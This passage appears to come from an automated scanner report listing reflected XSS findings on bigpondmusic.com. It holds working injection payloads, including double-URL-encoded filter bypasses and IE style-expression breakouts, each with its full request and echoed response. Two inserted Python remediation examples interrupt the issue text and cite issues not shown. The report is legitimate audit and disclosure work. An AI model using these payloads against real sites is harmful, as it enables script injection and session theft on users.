The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e0de%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f9dc95793b was submitted in the REST URL parameter 2. This input was echoed as 1e0de"><script>alert(1)</script>9f9dc95793b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums1e0de%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f9dc95793b/NewRelease/Format-Album/By-ReleaseDate/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88484


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums1e0de"><script>alert(1)</script>9f9dc95793b/NewRelease/Format-Album/By-ReleaseDate/" />
...[SNIP]...

2.230. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 973fc'%3ba135ef1b3df was submitted in the REST URL parameter 2. This input was echoed as 973fc';a135ef1b3df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/Albums973fc'%3ba135ef1b3df/NewRelease/Format-Album/By-ReleaseDate/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88373


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'browse';
   s.prop4 = 'albums973fc';a135ef1b3df';
   s.prop5 = 'newrelease';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.p
...[SNIP]...

2.231. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e98eb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2d7fe67e03a was submitted in the REST URL parameter 3. This input was echoed as e98eb"><script>alert(1)</script>2d7fe67e03a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewReleasee98eb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2d7fe67e03a/Format-Album/By-ReleaseDate/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:49:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88255


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewReleasee98eb"><script>alert(1)</script>2d7fe67e03a/Format-Album/By-ReleaseDate/" />
...[SNIP]...

2.232. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3fdf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527194949c3914 was submitted in the REST URL parameter 3. This input was echoed as 3fdf2'style='x:expression(alert(1))'194949c3914 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
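The validate-then-decode ordering that issues 2.222 through 2.232 above attribute to the application, shown as an added example in Python. This is not code from the report or from the affected site. The exact character blocklist the application uses is not known, so the one modelled here is an assumption; the double-encoded payload is the one the report submitted in 2.223 and the single-encoded variant is constructed for comparison.

```python
from html import escape
from typing import Optional
from urllib.parse import unquote

# Hypothetical blocklist. The report only says the application "attempts to
# block certain characters that are often used in XSS attacks"; the exact set
# is an assumption made for this example.
BLOCKED_CHARS = frozenset('<>"\'')

# Payload the report submitted in REST URL parameter 4 (issue 2.223),
# double URL-encoded: %2522 -> %22 -> "
DOUBLE_ENCODED = (
    "d078c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72a36c9a5ae"
)
# The same payload encoded only once (constructed here for comparison).
SINGLE_ENCODED = "d078c%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e72a36c9a5ae"


def passes_blocklist(value: str) -> bool:
    """True when none of the blocked characters occur in value."""
    return BLOCKED_CHARS.isdisjoint(value)


def vulnerable_reflect(raw_segment: str) -> Optional[str]:
    """Validate-then-decode ordering, as the report infers for REST URL parameters.

    IIS/ASP.NET has already URL-decoded the path segment once by the time the
    application sees it. The application validates that form, then decodes it
    a second time and copies the result into the page. Returns the string that
    reaches the HTML, or None when the blocklist rejects the request.
    """
    server_decoded = unquote(raw_segment)       # first decode: web server
    if not passes_blocklist(server_decoded):    # validator sees %22 %3e %3c, not " > <
        return None
    return unquote(server_decoded)              # second decode re-creates " > <


def hardened_reflect(raw_segment: str) -> str:
    """Decode exactly once, then encode for the double-quoted attribute context.

    The second decode is dropped entirely (the server already did one), and
    output encoding, not a character blocklist, is what stops the breakout.
    """
    canonical = unquote(raw_segment)
    return escape(canonical, quote=True)


def hidden_input(value: str) -> str:
    """Render the parentUrl hidden field the report shows the value landing in."""
    return f'<input type="hidden" name="parentUrl" value="{value}" />'


if __name__ == "__main__":
    print(hidden_input(vulnerable_reflect(DOUBLE_ENCODED) or ""))
    print(hidden_input(hardened_reflect(DOUBLE_ENCODED)))
    print(hidden_input(hardened_reflect(SINGLE_ENCODED)))
```

The single-encoded request is rejected by the blocklist, exactly as the report describes, while the double-encoded one passes validation and only turns into a raw quote and angle brackets at the second decode. In the hardened path the double-encoded payload is reflected as harmless literal text containing percent signs, and a raw quote is written as an entity, so the attribute count of the rendered tag never changes.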

Request

GET /browse/Albums/NewRelease3fdf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527194949c3914/Format-Album/By-ReleaseDate/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88269


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/browse/Albums/NewRelease3fdf2'style='x:expression(alert(1))'194949c3914/Format-Album/By-ReleaseDate/' />
...[SNIP]...

2.233. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45536'%3bfd30ddbd2c3 was submitted in the REST URL parameter 3. This input was echoed as 45536';fd30ddbd2c3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
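Context-specific output encoding for the two sinks this report keeps landing in, the single-quoted SiteCatalyst string (s.prop5 = '...', issues 2.221, 2.228, 2.230 and 2.233) and the quoted attributes of the canonical link and parentUrl field (2.222 onwards), shown as an added example that is not part of the report or of the affected site. The echoed values are those the report shows for 2.221 and 2.222; the function names and the HTMLParser-based attribute check are this example's own.

```python
import html
from html.parser import HTMLParser
from typing import List, Tuple

# Values as the report shows them echoed (issues 2.221 and 2.222 above).
JS_PAYLOAD = "newrelease53e59';f3ee490db89"
ATTR_PAYLOAD = (
    "http://bigpondmusic.com/browse/Albums/NewRelease/"
    "Format-Album2cf15'style='x:expression(alert(1))'dd646e40ee3/By-ReleaseDate"
)


def js_string_literal(value: str) -> str:
    """Single-quoted JavaScript string literal with every character outside
    [A-Za-z0-9] hex-escaped, so neither ' ; nor </script> survive unescaped."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(f"\\u{ord(ch):04x}")
    return "'" + "".join(out) + "'"


def analytics_assignment(prop5: str) -> str:
    """The s.prop5 line from the page's SiteCatalyst block, rendered safely."""
    return f"s.prop5 = {js_string_literal(prop5)};"


def canonical_link(url: str) -> str:
    """<link rel='canonical'> with the href encoded for a single-quoted attribute."""
    return f"<link rel='canonical' href='{html.escape(url, quote=True)}' />"


def canonical_link_unsafe(url: str) -> str:
    """Raw concatenation, the pattern the report found in the response."""
    return f"<link rel='canonical' href='{url}' />"


class _AttrCollector(HTMLParser):
    """Collects the attributes of every start tag fed to it."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend((name, value or "") for name, value in attrs)


def attributes_of(tag_html: str) -> List[Tuple[str, str]]:
    """Parse one start tag the way a browser tokeniser would and return its attributes.

    A stray quote followed by style=... becomes a real attribute; an entity
    encoded quote stays inside the href value.
    """
    p = _AttrCollector()
    p.feed(tag_html)
    p.close()
    return p.attrs


if __name__ == "__main__":
    print(analytics_assignment(JS_PAYLOAD))
    print(attributes_of(canonical_link_unsafe(ATTR_PAYLOAD)))
    print(attributes_of(canonical_link(ATTR_PAYLOAD)))
```

The JavaScript encoder deliberately does not rely on json.dumps alone: that leaves "</" untouched, and a "</script>" inside the literal would still end the script element at the HTML level. The attribute check parses the rendered tag and shows that the unsafe rendering grows a style attribute while the encoded one keeps exactly rel and href, with the browser seeing the original quote characters as data.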

Request

GET /browse/Albums/NewRelease45536'%3bfd30ddbd2c3/Format-Album/By-ReleaseDate/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:49:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
globalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'browse';
   s.prop4 = 'albums';
   s.prop5 = 'newrelease45536';fd30ddbd2c3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '|' + s.prop5;
   s.
...[SNIP]...

2.234. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ec3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b31d3a53b was submitted in the REST URL parameter 4. This input was echoed as 15ec3"><script>alert(1)</script>6b31d3a53b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Album15ec3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b31d3a53b/By-ReleaseDate/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:49:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album15ec3"><script>alert(1)</script>6b31d3a53b/By-ReleaseDate/" />
...[SNIP]...

2.235. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 20c0d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279b7282ad8cf was submitted in the REST URL parameter 4. This input was echoed as 20c0d'style='x:expression(alert(1))'9b7282ad8cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Album20c0d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279b7282ad8cf/By-ReleaseDate/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:49:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88406


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album20c0d'style='x:expression(alert(1))'9b7282ad8cf/By-ReleaseDate/' />
...[SNIP]...

2.236. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dfd6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1005c5ca468 was submitted in the REST URL parameter 5. This input was echoed as 9dfd6"><script>alert(1)</script>1005c5ca468 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate9dfd6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1005c5ca468/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:49:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88406


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate9dfd6"><script>alert(1)</script>1005c5ca468/" />
...[SNIP]...

2.237. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 56504%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527872ba18650f was submitted in the REST URL parameter 5. This input was echoed as 56504'style='x:expression(alert(1))'872ba18650f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate56504%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527872ba18650f/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:49:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88185


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate56504'style='x:expression(alert(1))'872ba18650f/' />
...[SNIP]...

2.238. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4554"style%3d"x%3aexpression(alert(1))"10ebfd1a26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4554"style="x:expression(alert(1))"10ebfd1a26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/?c4554"style%3d"x%3aexpression(alert(1))"10ebfd1a26=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:48:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 182073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>New Release Albums - BigPond
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/?c4554"style="x:expression(alert(1))"10ebfd1a26=1" />
...[SNIP]...

2.239. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21295"style%3d"x%3aexpression(alert(1))"b2c9d5ba0bb was submitted in the ref parameter. This input was echoed as 21295"style="x:expression(alert(1))"b2c9d5ba0bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/?ref=Net-Head-Music-Charts21295"style%3d"x%3aexpression(alert(1))"b2c9d5ba0bb HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 182789


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>New Release Albums - BigPond
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/?ref=Net-Head-Music-Charts21295"style="x:expression(alert(1))"b2c9d5ba0bb" />
